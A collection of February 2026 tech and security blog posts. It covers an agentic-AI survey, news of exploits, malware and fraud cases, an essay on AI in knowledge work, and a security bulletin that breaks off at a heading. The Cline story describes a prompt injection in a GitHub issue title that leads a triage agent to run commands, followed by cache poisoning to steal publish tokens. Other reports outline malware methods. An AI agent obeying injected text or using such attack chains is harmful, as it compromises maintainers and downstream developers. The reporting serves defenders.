Friday, February 20, 2026

State of Agentic AI Report: Key Findings

Based on Docker’s State of Agentic AI report, a global survey of more than 800 developers, platform engineers, and technology decision-makers, this blog summarizes what’s really happening as agentic AI scales within organizations. Drawing on insights from decision-makers and purchase influencers worldwide, we’ll give you a preview of not only where teams are seeing early wins but also what’s still missing to move from experimentation to enterprise-grade adoption.

Rapid adoption, early maturity

60% of organizations already have AI agents in production, and 94% view building agents as a strategic priority, but most deployments remain internal and focused on productivity and operational efficiency.

Security and complexity are the top barriers

40% of respondents cite security as the #1 challenge in scaling agentic AI, with 45% struggling to ensure tools are secure and enterprise-ready. Technical complexity compounds the challenge. One in three organizations (33%) report orchestration difficulties as multi-model and multi-cloud environments proliferate (79% of organizations run agents across two or more environments).

MCP shows promise but isn’t enterprise-ready

85% of teams are familiar with the Model Context Protocol (MCP), yet most report significant security, configuration, and manageability issues that prevent production-scale deployment.

Want the full picture? Download the latest State of Agentic AI report to explore deeper insights and practical recommendations for scaling agentic AI in your organization.

Fear of vendor lock-in is real

Enterprises worry about dependencies in core agent and agentic infrastructure layers such as model hosting, LLM providers, and even cloud platforms. Seventy-six percent of global respondents report active concerns about vendor lock-in, rising to 88% in France, 83% in Japan, and 82% in the UK.

Containerization remains foundational

94% use containers for agent development or production, and 98% follow the same cloud-native workflows as traditional software, establishing containers as the proven substrate for agentic AI infrastructure.

Long-term outlook

Rather than a “year of the agents,” the data points to a decade-long transformation. Organizations are laying the governance and trust foundations now for scalable, enterprise-grade agent ecosystems.


The path forward

The path forward doesn’t require reinvention so much as consolidation around a trust layer: access to trusted content and components that can be safely discovered and reused; secure-by-default runtimes; standardized orchestration and policy; and portable, auditable packaging. Agentic AI’s near-term value is already real in internal workflows; unlocking the next wave depends on standardizing how we secure, orchestrate, and ship agents. Teams that invest now in this trust layer, on top of the container foundations they already know, will be first to scale agents from local productivity to durable, enterprise-wide outcomes.

Download the full Agentic AI report for more insights and recommendations on how to scale agents for the enterprise.


from Docker https://ift.tt/JVmlhNx
via IFTTT

BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration

Threat actors have been observed exploiting a recently disclosed critical security flaw impacting BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) products to conduct a wide range of malicious actions, including deploying VShell and Spark RAT.

The vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), allows attackers to execute operating system commands in the context of the site user.

In a report published Thursday, Palo Alto Networks Unit 42 said it detected the security flaw being actively exploited in the wild for network reconnaissance, web shell deployment, command-and-control (C2), backdoor and remote management tool installs, lateral movement, and data theft.

The campaign has targeted financial services, legal services, high technology, higher education, wholesale and retail, and healthcare sectors across the U.S., France, Germany, Australia, and Canada.

The cybersecurity company described the vulnerability as a case of sanitization failure that enables an attacker to leverage the affected "thin-scc-wrapper" script that's reachable via WebSocket interface to inject and execute arbitrary shell commands in the context of the site user.

"While this account is distinct from the root user, compromising it effectively grants the attacker control over the appliance's configuration, managed sessions and network traffic," security researcher Justin Moore said.

The current scope of attacks exploiting the flaw ranges from reconnaissance to backdoor deployment -

  • Using a custom Python script to gain access to an administrative account.
  • Installing multiple web shells across directories, including a PHP backdoor capable of executing arbitrary PHP code without writing new files to disk, as well as a bash dropper that establishes a persistent web shell.
  • Deploying malware such as VShell and Spark RAT.
  • Using out-of-band application security testing (OAST) techniques to validate successful code execution and fingerprint compromised systems.
  • Executing commands to stage, compress and exfiltrate sensitive data, including configuration files, internal system databases and a full PostgreSQL dump, to an external server.

"The relationship between CVE-2026-1731 and CVE-2024-12356 highlights a localized, recurring challenge with input validation within distinct execution pathways," Unit 42 said.

"CVE-2024-12356's insufficient validation was using third-party software (postgres), while CVE-2026-1731's insufficient validation problem occurred in the BeyondTrust Remote Support (RS) and older versions of the BeyondTrust Privileged Remote Access (PRA) codebase."

With CVE-2024-12356 exploited by China-nexus threat actors like Silk Typhoon, the cybersecurity company noted that CVE-2026-1731 could also be a target for sophisticated threat actors.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) updated its Known Exploited Vulnerabilities (KEV) catalog entry for CVE-2026-1731 to confirm that the bug has been exploited in ransomware campaigns.



from The Hacker News https://ift.tt/JPkxWXy
via IFTTT

Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems

In yet another software supply chain attack, the open-source, artificial intelligence (AI)-powered coding assistant Cline CLI was updated to stealthily install OpenClaw, a self-hosted autonomous AI agent that has become exceedingly popular in the past few months.

"On February 17, 2026, at 3:26 AM PT, an unauthorized party used a compromised npm publish token to publish an update to Cline CLI on the NPM registry: cline@2.3.0," the maintainers of the Cline package said in an advisory. "The published package contains a modified package.json with an added postinstall script: "postinstall": "npm install -g openclaw@latest"."

As a result, OpenClaw was installed on the developer's machine whenever Cline version 2.3.0 was installed. Cline said no additional modifications were introduced to the package and no malicious behavior was observed. However, it noted that the installation of OpenClaw was not authorized or intended.
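Per the advisory, the only change to the package was that added hook; a minimal reconstruction of the relevant package.json fragment (other fields omitted, version and script text per the advisory) would look like:

```json
{
  "name": "cline",
  "version": "2.3.0",
  "scripts": {
    "postinstall": "npm install -g openclaw@latest"
  }
}
```

npm runs a postinstall script automatically after the package itself is installed, which is why simply installing cline@2.3.0 was enough to pull OpenClaw onto the machine.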

The supply chain attack affects all users who installed the Cline CLI package published on npm, specifically version 2.3.0, during an approximately eight-hour window between 3:26 a.m. PT and 11:30 a.m. PT on February 17, 2026. The incident does not impact Cline's Visual Studio Code (VS Code) extension and JetBrains plugin.

To mitigate the unauthorized publication, Cline maintainers have released version 2.4.0. Version 2.3.0 has since been deprecated and the compromised token has been revoked. Cline also said the npm publishing mechanism has been updated to support OpenID Connect (OIDC) via GitHub Actions.
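The advisory doesn't show Cline's updated workflow; as a hedged sketch, npm trusted publishing via GitHub Actions OIDC generally looks like the following (the workflow name, trigger, and Node version are illustrative assumptions):

```yaml
# Hypothetical publish workflow using npm trusted publishing (OIDC).
# There is no long-lived NPM_TOKEN secret to steal: the job requests a
# short-lived OIDC token that the npm registry verifies at publish time.
name: publish
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write   # required for OIDC token exchange
      contents: read
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 22
          registry-url: "https://registry.npmjs.org"
      - run: npm ci
      - run: npm publish
```

This only closes the token-theft avenue once the package on npmjs.com is configured to trust that exact repository and workflow, and once publication through classic tokens is disabled.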

In a post on X, the Microsoft Threat Intelligence team said it observed a "small but noticeable uptick" in OpenClaw installations on February 17, 2026, as a result of the supply chain compromise of the Cline CLI package. According to StepSecurity, the compromised Cline package was downloaded roughly 4,000 times during the eight-hour stretch.

Users are advised to update to the latest version, check their environment for any unexpected installation of OpenClaw, and remove it if not required.

"Overall impact is considered low, despite high download counts: OpenClaw itself is not malicious, and the installation does not include the installation/start of the Gateway daemon," Endor Labs researcher Henrik Plate said.

"Still, this event emphasizes the need for package maintainers to not only enable trusted publishing, but also disable publication through traditional tokens – and for package users to pay attention to the presence (and sudden absence) of corresponding attestations."

Leveraging Clinejection to Leak Publication Secrets

While it's currently not clear who is behind the breach of the npm package and what their end goals were, it comes after security researcher Adnan Khan discovered that attackers could steal the repository's authentication tokens through prompt injection by taking advantage of the fact that it is configured to automatically triage any incoming issue raised on GitHub.

"When a new issue is opened, the workflow spins up Claude with access to the repository and a broad set of tools to analyze and respond to the issue," Khan explained. "The intent: automate first-response to reduce maintainer burden."

But a misconfiguration in the workflow meant that it gave Claude excessive permissions to achieve arbitrary code execution within the default branch. This aspect, combined with a prompt injection embedded within the GitHub issue title, could be exploited by an attacker with a GitHub account to trick the AI agent into running arbitrary commands and compromise production releases.

This shortcoming, which builds on PromptPwnd, has been codenamed Clinejection. It was introduced in a source code commit made on December 21, 2025. The attack chain is outlined below -

  • Prompt Claude to run arbitrary code in issue triage workflow
  • Evict legitimate cache entries by filling the cache with more than 10GB of junk data, triggering GitHub's Least Recently Used (LRU) cache eviction policy
  • Set poisoned cache entries matching the nightly release workflow's cache keys
  • Wait for the nightly publish to run at around 2 a.m. UTC and trigger on the poisoned cache entry

"This would allow an attacker to obtain code execution in the nightly workflow and steal the publication secrets," Khan noted. "If a threat actor were to obtain the production publish tokens, the result would be a devastating supply chain attack."

"A malicious update pushed through compromised publication credentials would execute in the context of every developer who has the extension installed and set to update automatically."

In other words, the attack sequence employs GitHub Actions cache poisoning to pivot from the triage workflow to a highly privileged workflow, such as the Publish Nightly Release and Publish NPM Nightly workflows, and steal the nightly publication credentials, which have the same access as those used for production releases.

As it turns out, this is exactly what happened, with the unknown threat actor weaponizing an active npm publish token (referred to as NPM_RELEASE_TOKEN or NPM_TOKEN) to authenticate with the Node.js registry and publish Cline version 2.3.0.

"We have been talking about AI supply chain security in theoretical terms for too long, and this week it became an operational reality," Chris Hughes, VP of Security Strategy at Zenity, said in a statement shared with The Hacker News. "When a single issue title can influence an automated build pipeline and affect a published release, the risk is no longer theoretical. The industry needs to start recognizing AI agents as privileged actors that require governance."



from The Hacker News https://ift.tt/nQ7s1dY
via IFTTT

ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT RAT

Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT).

"The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic," Elastic Security Labs said in a Friday report.

According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. The campaign was discovered earlier this month.

It's also assessed to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT. The end goal of the attack is suspected to be ransomware deployment or data exfiltration.

In the infection sequence highlighted by Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code that's responsible for loading an externally hosted PHP script. The PHP script then proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue.

This, in turn, leads to the execution of a PowerShell command, which then contacts a command-and-control (C2) server to fetch a second-stage PowerShell script that patches Windows event logging (ETW) and antivirus scanning (AMSI) before dropping a Lua-based loader. In the final stage, the Lua script decrypts and executes in memory shellcode that delivers MIMICRAT.

The Trojan uses HTTPS for communicating with the C2 server, allowing it to accept its 22 commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.

"The campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach," security researcher Salim Bitam said. "Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting."



from The Hacker News https://ift.tt/02TtW9z
via IFTTT

Ukrainian National Sentenced to 5 Years in North Korea IT Worker Fraud Case

A 29-year-old Ukrainian national has been sentenced to five years in prison in the U.S. for his role in facilitating North Korea's fraudulent information technology (IT) worker scheme.

In November 2025, Oleksandr "Alexander" Didenko pleaded guilty to wire fraud conspiracy and aggravated identity theft for stealing the identities of U.S. citizens and selling them to IT workers to help them land jobs at 40 U.S. companies and draw regular salaries, which were then funneled back to the regime to support its weapons programs. He was apprehended by Polish authorities in late 2024, and later extradited to the U.S.

Didenko has also been ordered to serve 12 months of supervised release and to pay $46,547.28 in restitution. Last year, Didenko also agreed to forfeit more than $1.4 million, which includes about $181,438 in U.S. dollars and cryptocurrency seized from him and his co-conspirators.

The defendant is said to have run a website named Upworksell[.]com to help overseas IT workers buy or rent stolen or borrowed identities since the start of 2021. The IT workers abused these identities to apply for jobs on freelance work platforms based in California and Pennsylvania. The site was seized by authorities on May 16, 2024.

In addition, Didenko paid individuals in the U.S. to receive and host laptops at their residences in Virginia, Tennessee, and California. The idea was to give the impression that the workers were located in the country, when, in reality, they were connecting remotely from countries like China, to which they were dispatched.

As part of the criminal scheme, Didenko managed as many as 871 proxy identities and facilitated the operation of at least three U.S.-based laptop farms. One of the computers was sent to a laptop farm run by Christina Marie Chapman in Arizona. Chapman was arrested in May 2024 and sentenced to 102 months in prison in July 2025 for participating in the scheme.

Furthermore, he enabled his North Korean clients to access the U.S. financial system through Money Service Transmitters instead of having to open an account at a bank within the U.S. These money transfer services were used to move employment income to foreign bank accounts. Officials said Didenko's clients were paid hundreds of thousands of dollars for their work.

"Defendant Didenko's scheme funneled money from Americans and U.S. businesses, into the coffers of North Korea, a hostile regime," said U.S. Attorney Jeanine Ferris Pirro. "Today, North Korea is not only a threat to the homeland from afar, it is an enemy within."

"By using stolen and fraudulent identities, North Korean actors are infiltrating American companies, stealing information, licensing, and data that is harmful to any business. But more than that, money paid to these so-called employees goes directly to munitions programs in North Korea."

Despite continued law enforcement actions, the Hermit Kingdom's conspiracy shows no signs of stopping. If anything, the operation has continued to evolve with new tactics and techniques to evade detection.

According to a report from threat intelligence firm Security Alliance (SEAL) last week, the IT workers have begun to apply for remote positions using real LinkedIn accounts of individuals they're impersonating in an effort to make their fraudulent applications look authentic.



from The Hacker News https://ift.tt/8QnOKWd
via IFTTT

FBI Reports 1,900 ATM Jackpotting Incidents Since 2020, $20M Lost in 2025

The U.S. Federal Bureau of Investigation (FBI) has warned of an increase in ATM jackpotting incidents across the country, leading to losses of more than $20 million in 2025.

The agency said 1,900 ATM jackpotting incidents have been reported since 2020, of which 700 took place last year. In December 2025, the U.S. Department of Justice (DoJ) said about $40.73 million has been collectively lost to jackpotting attacks since 2021.

"Threat actors exploit physical and software vulnerabilities in ATMs and deploy malware to dispense cash without a legitimate transaction," the FBI said in a Thursday bulletin.

The jackpotting attacks involve the use of specialized malware, such as Ploutus, to infect ATMs and force them to dispense cash. In most cases, cybercriminals have been observed gaining unauthorized access to the machines by opening an ATM face with widely available generic keys.


There are at least two ways the malware is deployed: removing the ATM's hard drive, connecting it to the attacker's computer, copying the malware onto it, reattaching it, and rebooting the ATM; or replacing the drive entirely with a foreign hard drive preloaded with the malware and rebooting.

Regardless of the method used, the end result is the same. The malware is designed to interact directly with the ATM hardware, thereby getting around any security controls present in the original ATM software.

Because the malware does not require a connection to an actual bank card or customer account to dispense cash, it can be used against ATMs of different manufacturers with little to no code changes, as the underlying Windows operating system is exploited during the attack.

Ploutus was first observed in Mexico in 2013. Once installed, it grants threat actors complete control over an ATM, enabling them to trigger cash-outs that the FBI said can occur in minutes and are harder to detect until after the money is withdrawn.

"Ploutus malware exploits the eXtensions for Financial Services (XFS), the layer of software that instructs an ATM what to physically do," the FBI explained.


"When a legitimate transaction occurs, the ATM application sends instructions through XFS for bank authorization. If a threat actor can issue their own commands to XFS, they can bypass bank authorization entirely and instruct the ATM to dispense cash on demand."

The agency has outlined a long list of recommendations that organizations can adopt to mitigate jackpotting risks. This includes tightening physical security by installing threat sensors, setting up security cameras, and changing standard locks on ATM devices.

Other measures involve auditing ATM devices, changing default credentials, configuring an automatic shutdown mode once indicators of compromise are detected, enforcing device allowlisting to prevent connection of unauthorized devices, and maintaining logs.




from The Hacker News https://ift.tt/uaRLPy0
via IFTTT

Thursday, February 19, 2026

What will knowledge work be in 18 months? Look at what AI is doing to coding right now.

There’s a lot of buzz about something big happening in software engineering thanks to the latest batch of AI models. However, most knowledge workers think this is just a “coding thing” that doesn’t apply to them. They’re wrong.

Dan Shapiro, Glowforge CEO and Wharton Research Fellow, recently published a five-level framework which maps the level of AI assistance for coding from simple searches all the way to a “dark factory,” where AI is essentially just a black box that turns specs into software.

I want to walk through those five levels, because I think this pattern also applies to knowledge work, and we knowledge workers are not far behind coders in this regard.

Shapiro’s five levels of AI use in coding

(I’ve condensed but mostly used his words here)

  • Level 0: AI is spicy autocomplete. You’re doing manual coding and not a character hits the disk without your approval. You might use AI as a super search engine, or occasionally accept a suggestion, but the code is unmistakably yours.
  • Level 1: AI is a coding intern. You offload discrete tasks to AI. “Write a unit test.” “Add a docstring.” You’re seeing speedups, but you’re still moving at the rate you type.
  • Level 2: AI is a junior developer. You’re a “pair programmer” with AI and now have a junior buddy to hand off all your boring stuff to. You code in a flow state and are more productive than you’ve ever been. Shapiro says 90% of “AI-native” developers are here, and the danger is that at Level 2, and every level after it, the coder feels like they’ve maxed out and they’re done. But they’re not.
  • Level 3: AI is a developer. You’re not the developer anymore. (That’s your AI’s job.) You’re the manager. You’re the human in the loop. Your coding agent is always running in multiple tabs, and you spend your days reviewing code and changes. For many people, this feels like things got worse. Almost everyone tops out here.
  • Level 4: AI is an engineering team. Now you’re not even a developer manager, you’re a product manager. You write specs, argue with the AI about specs, craft skills, plan schedules, then leave for 12 hours and check if the tests pass. (Shapiro says he’s here.)
  • Level 5: AI is a dark software factory. You’re the engineering manager who sets the goals of the system in plain English. The AI defines implementation, writes code, tests, fixes bugs, and ships. It’s not really a software process anymore. It’s a black box that turns specs into software.

AI + coding future thinking also applies to AI + knowledge work

Nate B. Jones covers the AI-and-software-engineering beat better than almost anyone. His YouTube videos are “required watching” for me. I realized recently that everything he says about how AI is impacting software engineering also applies to AI impacting knowledge workers. For example, here are some quotes of his from recent videos about coding that apply verbatim to knowledge workers using AI:

“The bottleneck has shifted. You are now the manager of however many agents you can keep track of productively. Your productive capacity is limited now only by your attention span and your ability to scope tasks well.”

“These are supervision problems, not capability problems. And the solution isn’t to do the work yourself. It’s to get better at your management skills.”

If we do some simple Mad Libs-style find-and-replace, Nate’s also a pretty good “future of work” strategist! Just swap out:

  • code → deliverables / work product / output
  • engineer → knowledge worker
  • technical leader → business leader
  • implementation → producing deliverables
  • system → outcome
  • tests → success criteria
  • codebase → work stream
  • syntax → formatting
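As an illustration (not from the original post), the swap list above can be run as a literal find-and-replace. A minimal Python sketch, applying longer phrases first so “codebase” isn’t clobbered by the “code” rule:

```python
# Hypothetical translator for the swap list above (illustrative only).
PAIRS = [
    ("technical leader", "business leader"),
    ("implementation", "producing deliverables"),
    ("codebase", "work stream"),
    ("engineer", "knowledge worker"),
    ("system", "outcome"),
    ("syntax", "formatting"),
    ("tests", "success criteria"),
    ("code", "deliverables"),
]

def translate(text: str) -> str:
    # Apply longest patterns first so "codebase" wins over "code".
    for old, new in sorted(PAIRS, key=lambda p: -len(p[0])):
        text = text.replace(old, new)
    return text

print(translate("It's less time writing code."))
# -> It's less time writing deliverables.
```

Real usage would want word-boundary handling (e.g. a regex with \b) so “coder” doesn’t become “deliverablesr”, but this is enough to replay the quotes that follow.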

Let’s try that on some more quotes from his recent videos:

“It’s less time writing code → deliverables. It’s much more time defining what you want. It’s much more time evaluating whether you got there.”

“Most engineers → knowledge workers have spent years developing their intuitions around implementation → producing deliverables and those are now not super useful. The new skill is describing the system → outcome precisely enough that AI can build it, and then writing tests → success criteria that capture what you actually need, and reviewing AI-generated code → output for subtle conceptual errors rather than simple syntax → formatting mistakes.”

“If you’re not thinking through what you want done, the speed can lead you to very quickly build a giant pile of code → work product that’s not very useful. That is a superpower that everyone has been handed for better or worse and we are about to see who is actually able to think well.”

“We need to think as technical → business leaders about where engineers → knowledge workers should stand in relation to the code → AI-generated output based on the risk profile of that codebase → work stream itself.”

That last one illustrates the power of this perfectly. That concept applies to software engineering, but I never would have thought about it in the context of knowledge work. Yet it 100% applies there as well. Which strategic deliverables require human review and which can you trust to the Dark Knowledge Factory?

The five levels of AI use in knowledge work

Now let’s take Shapiro’s five levels of AI use in coding and translate them to knowledge work. (Some of these loosely map to my own 7-stage roadmap for human-AI collaboration in the workplace from six months ago, though Shapiro’s levels address the relationship between humans and AI, whereas I focused on the mechanics of the collaboration.)

Putting Shapiro’s coding levels through our Mad Libs code-to-knowledge work translator:

  • Level 0: AI is a spicy search engine. You’re doing the knowledge work and not a word hits the page without your approval. You might use AI as a super search engine, or occasionally accept a suggested sentence, but the deliverable is unmistakably yours. This is most enterprise knowledge workers today.
  • Level 1: AI is a research intern. You offload discrete tasks to AI. “Summarize this document.” “Draft a response to this email.” You’re seeing speedups, but you’re still moving at the rate you type. You’re still the one producing the deliverable. This is most people’s experience with Office Copilot.
  • Level 2: AI is a junior analyst. You’re “pair working” with AI and now have a junior buddy to hand off all your boring stuff to. You’re in a flow state and more productive than you’ve ever been. Workers at this level use persistent AI collaboration spaces, like Google NotebookLM, Claude Projects, or Copilot Notebooks. Like their coding counterparts, at Level 2 and every level after it, knowledge workers feel like they’ve maxed out and they’re done. But they haven’t.
  • Level 3: AI is an analyst. You’re not the one producing work anymore. (That’s your AI’s job.) You’re the manager. You’re the human in the loop. Your AI is always running and you spend your days reviewing and editing everything it generates. Strategy decks, market analyses, competitive intelligence, communications. Your life is tracked changes. For some workers, this feels like things got worse. Almost everyone tops out here. This is where workers using a personal AI knowledge system / “second brain” are. This is where I am.
  • Level 4: AI is a strategy team. Now you’re not even a manager, you’re a director. You don’t write deliverables or even review them line by line. You write specs for deliverables. You define what a good competitive analysis looks like, what the acceptance criteria are, and what scenarios it needs to handle. You craft the prompts, system instructions, and the evaluation rubrics. Then you walk away and check if the output passes your scenarios.
  • Level 5: AI is a dark knowledge factory. You are the executive who sets the goals of the organization in plain English. The AI defines the approach, produces deliverables, evaluates quality, iterates, and ships. It’s not really a work process anymore. It’s a black box that turns business intent into business outcomes. A handful of people run what used to be an entire analyst function. The verification framework is the intellectual property, not the reports themselves.

But how do you know the AI’s work is any good?

I feel like I can follow the analogy through Level 3, but Levels 4 and 5 seem weird to me, and it’s hard to see exactly how they would apply to knowledge work. (Heh, funny: I’m personally at Level 3, and as Shapiro wrote, people past Level 2 think that whatever level they’re at is the top.)

The hardest question at Levels 4 and 5 is the same whether you’re writing code or strategy memos: how do you verify the output without a human reviewing every piece?

In code, the answer turned out to be end-to-end behavioral tests stored separately from the codebase (so the AI can’t cheat). For knowledge work, I think it maps to something like:

  • You define what “good” looks like (for a strategy recommendation, a presentation, etc.) and you deliberately keep those separate from the AI so it can’t game the criteria. These need to be real and deep things, like “Does this account for the competitor’s likely response? Does this identify second-order effects? Would the CFO approve this?”
  • Then, once the main AI generates the content, a different AI uses your verification docs and is prompted to be a skeptical board member, a hostile competitor, or a regulatory lawyer and tries to find flaws. This way, the verification loop isn’t human; it’s AI verifying AI against criteria that humans defined.
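A minimal sketch of that loop, with the model call stubbed out. The llm() function here is a hypothetical stand-in (keyword checks, not a real API) so the control flow is concrete:

```python
# Hedged sketch: AI verifying AI against human-defined criteria.
# llm() is a hypothetical stand-in for a model call, stubbed with
# keyword checks so the loop actually runs end to end.

CRITERIA = [
    "accounts for the competitor's likely response",
    "identifies second-order effects",
]

def llm(prompt: str) -> str:
    """Stub reviewer: 'PASS' if the draft mentions the criterion's key term."""
    criterion = prompt.split("CRITERION:")[1].split("DRAFT:")[0]
    draft = prompt.split("DRAFT:")[1]
    key = "competitor" if "competitor" in criterion else "second-order"
    return "PASS" if key in draft else "FAIL"

def verify(draft: str, criteria: list) -> list:
    """Ask a skeptical reviewer about each criterion; return the failures."""
    failures = []
    for c in criteria:
        verdict = llm(
            "You are a skeptical board member. "
            f"CRITERION:{c} DRAFT:{draft}"
        )
        if verdict != "PASS":
            failures.append(c)
    return failures

draft = "We expect the competitor to cut prices; a second-order effect is churn."
print(verify(draft, CRITERIA))  # -> [] (all criteria pass)
```

In practice llm() would call whichever model plays the skeptical reviewer; the important design choice is that CRITERIA live outside the generating AI’s context so it can’t game them.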

(There will be a lot of interesting work done here in the next year!)

AI’s true impact on knowledge work is just beginning

As I wrote in the opening, most talk about AI’s impact today is focused on software engineering. But coding was the beachhead, not the destination. Software was first because code has built-in verification layers, specific syntax, and billions of pages on the internet about how to write good code.

Knowledge work is next, but the timeline will be more compressed. (We have better AI now and lots of lessons from the software world.) If frontier coding teams are at Level 4-5 today while frontier knowledge workers are only at Level 1-2, a pretty good way to know what knowledge work looks like in 18 months is to look at what coders are doing right now.

As we progress towards this future, remember that the bottleneck keeps moving. At Level 1 it’s “How fast can you produce work?” At Level 4 it’s “How precisely can you specify what should exist?” By Level 5 it’s “How rigorously can you verify that it’s good?” Level 5 of knowledge work will introduce a governance problem that nobody has a playbook for yet. Who owns the specs? Who defines the verifications? Who’s making sure the Dark Knowledge Factory isn’t producing hallucinated strategy recommendations that look right but fall apart under scrutiny?

Most enterprises don’t have the governance infrastructure for any of this, and it’s coming whether they’re ready or not.


Read more & connect

Join the conversation and discuss this post on LinkedIn. You can find all my posts on my author page (or via RSS).



from Citrix Blogs https://ift.tt/yGRPxQp
via IFTTT

ThreatsDay Bulletin: OpenSSL RCE, Foxit 0-Days, Copilot Leak, AI Password Flaws & 20+ Stories

  1. Privacy model hardening

    Google announced the first beta version of Android 17, with two privacy and security enhancements: the deprecation of Cleartext Traffic Attribute and support for HPKE Hybrid Cryptography to enable secure communication using a combination of public key and symmetric encryption (AEAD). "If your app targets (Android 17) or higher and relies on usesCleartextTraffic='true' without a corresponding Network Security Configuration, it will default to disallowing cleartext traffic," Google said. "You are encouraged to migrate to Network Security Configuration files for granular control."

  2. RaaS expands cross-platform reach

    A new analysis of the LockBit 5.0 ransomware has revealed that the Windows version packs in various defense evasion and anti-analysis techniques, including packing, DLL unhooking, process hollowing, patching Event Tracing for Windows (ETW) functions, and log clearing. "What's notable among the multiple systems support is its proclaimed capability to 'work on all versions of Proxmox,'" Acronis said. "Proxmox is an open-source virtualization platform and is being adopted by enterprises as an alternative to commercial hypervisors, which makes it another prime target of ransomware attacks." The latest version also introduces dedicated builds tailored for enterprise environments, highlighting the continued evolution of ransomware-as-a-service (RaaS) operations.

  3. Mac users lured via nested obfuscation

    Cybersecurity researchers have detailed a new evolution of the ClickFix social engineering tactic targeting macOS users. "Dubbed Matryoshka due to its nested obfuscation layers, this variant uses a fake installation/fix flow to trick victims into executing a malicious Terminal command," Intego said. "While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques — including an in-memory, compressed wrapper and API-gated network communications — designed to hinder static analysis and automated sandboxes." The campaign primarily targets users attempting to visit software review sites, leveraging typosquatting in the URL name to redirect them to fake sites and activate the infection chain.

  4. Loader pipeline drives rapid domain takeover

    Another new ClickFix campaign detected in February 2026 has been observed delivering a malware-as-a-service (MaaS) loader known as Matanbuchus 3.0. Huntress, which dissected the attack chain, assessed that the ultimate objective of the intrusion was to deploy ransomware or exfiltrate data, based on how rapidly the threat actor progressed from initial access to lateral movement to domain controllers via PsExec, rogue account creation, and Microsoft Defender exclusion staging. The attack also led to the deployment of a custom implant dubbed AstarionRAT that supports 24 commands to facilitate credential theft, SOCKS5 proxy, port scanning, reflective code loading, and shell execution. According to data from the cybersecurity company, ClickFix fueled 53% of all malware loader activity in 2025.

  5. Typosquat chain targets macOS credentials

    In yet another ClickFix campaign, threat actors are relying on the "reliable trick" to host malicious instructions on fake websites disguised as Homebrew ("homabrews[.]org") to trick users into pasting them on the Terminal app under the pretext of installing the macOS package manager. In the attack chain documented by Hunt.io, the commands in the typosquatted Homebrew domain are used to deliver a credential-harvesting loader and a second-stage macOS infostealer dubbed Cuckoo Stealer. "The injected installer looped on password prompts using 'dscl . -authonly,' ensuring the attacker obtained working credentials before deploying the second stage," Hunt.io said. "Cuckoo Stealer is a full-featured macOS infostealer and RAT: It establishes LaunchAgent persistence, removes quarantine attributes, and maintains encrypted HTTPS command-and-control communications. It collects browser credentials, session tokens, macOS Keychain data, Apple Notes, messaging sessions, VPN and FTP configurations, and over 20 cryptocurrency wallet applications." The use of "dscl . -authonly" has been previously observed in attacks deploying Atomic Stealer.

  6. Phobos affiliate detained in Europe

    Authorities from Poland's Central Bureau for Combating Cybercrime (CBZC) have detained a 47-year-old man over suspected ties to the Phobos ransomware group. He faces a potential prison sentence of up to five years. The CBZC said the "47-year-old used encrypted messaging to contact the Phobos criminal group, known for conducting ransomware attacks," adding the suspect's devices contained logins, passwords, credit card numbers, and server IP addresses that could have been used to launch "various attacks, including ransomware." The arrest is part of Europol's Operation Aether, which targets the 8Base ransomware group, believed to be linked to Phobos. It has been almost exactly a year since international law enforcement dismantled the 8Base crew. More than 1,000 organizations around the world have been targeted in Phobos ransomware attacks, and the cybercriminals are believed to have obtained over $16 million in ransom payments.

  7. Industrial ransomware surge accelerates

    There has been a sharp rise in the number of ransomware groups targeting industrial organizations as cybercriminals continue to exploit vulnerabilities in operational technology (OT) and industrial control systems (ICS), Dragos warned. A total of 119 ransomware groups targeting industrial organizations were tracked during 2025, a 49% increase from the 80 tracked in 2024. 2025 saw 3,300 industrial organizations around the world hit by ransomware, compared with 1,693 in 2024. The most targeted sector was manufacturing, followed by transportation. In addition, a hacking group tracked as Pyroxene has been observed conducting "supply chain-leveraged attacks targeting defense, critical infrastructure, and industrial sectors, with operations expanding from the Middle East into North America and Western Europe." It often leverages initial access provided by PARISITE to enable movement from IT into OT networks. Pyroxene overlaps with activity attributed to Imperial Kitten (aka APT35), a threat actor affiliated with the cyber arm of the Islamic Revolutionary Guard Corps (IRGC).

  8. Copilot bypassed DLP safeguards

    Microsoft confirmed a bug (CW1226324) that let Microsoft 365 Copilot summarize confidential emails from Sent Items and Drafts folders since January 21, 2026, without users' permission, bypassing data loss prevention (DLP) policies put in place to safeguard sensitive data. A fix was deployed by the company on February 3, 2026. However, the company did not disclose how many users or organizations were affected. "Users' email messages with a confidential label applied are being incorrectly processed by Microsoft 365 Copilot chat," Microsoft said. "The Microsoft 365 Copilot 'work tab' Chat is summarizing email messages even though these email messages have a sensitivity label applied, and a DLP policy is configured. A code issue is allowing items in the sent items and draft folders to be picked up by Copilot even though confidential labels are set in place."

  9. Jira trials weaponized for spam

